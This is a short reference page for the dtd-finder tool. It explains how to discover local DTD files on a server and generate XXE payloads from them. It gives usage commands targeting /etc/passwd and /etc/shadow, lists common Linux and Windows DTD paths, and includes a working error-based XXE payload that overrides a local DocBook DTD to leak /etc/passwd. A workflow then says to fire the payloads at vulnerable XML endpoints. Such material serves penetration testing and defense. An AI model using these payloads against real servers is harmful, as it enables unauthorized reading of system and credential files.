Description
dtd-finder discovers local DTD files on the target server and generates XXE payloads that leverage those DTDs. This technique bypasses many XXE defenses because it uses DTDs already present on the server rather than fetching external ones.
Installation
BASH
git clone https://github.com/GoSecure/dtd-finder.git
cd dtd-finder
# Download pre-built JAR from releasesBasic Usage
BASH
# List known DTDs for a system
java -jar dtd-finder.jar /usr/share/
# Generate XXE payloads
java -jar dtd-finder.jar /usr/share/ --xxeAdvanced Usage
BASH
# Generate payloads for specific file to read
java -jar dtd-finder.jar /usr/share/ --xxe --file /etc/passwd
# Test specific DTD
java -jar dtd-finder.jar /usr/share/xml/ --xxe --file /etc/shadowCommon Local DTDs
XML
<!-- Common DTD paths on Linux -->
/usr/share/yelp/dtd/docbookx.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/usr/share/sgml/dtd/xml-core/catalog.dtd
<!-- Common DTD paths on Windows -->
C:\Windows\System32\wbem\xml\cim20.dtd
C:\Windows\System32\wbem\xml\wmi20.dtd
<!-- XXE using local DTD override -->
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>Common Workflows
BASH
# Step 1: Run dtd-finder on common system paths
java -jar dtd-finder.jar / --xxe --file /etc/passwd
# Step 2: Use generated payloads in vulnerable XML endpoints
# Step 3: Test error-based exfil via local DTD override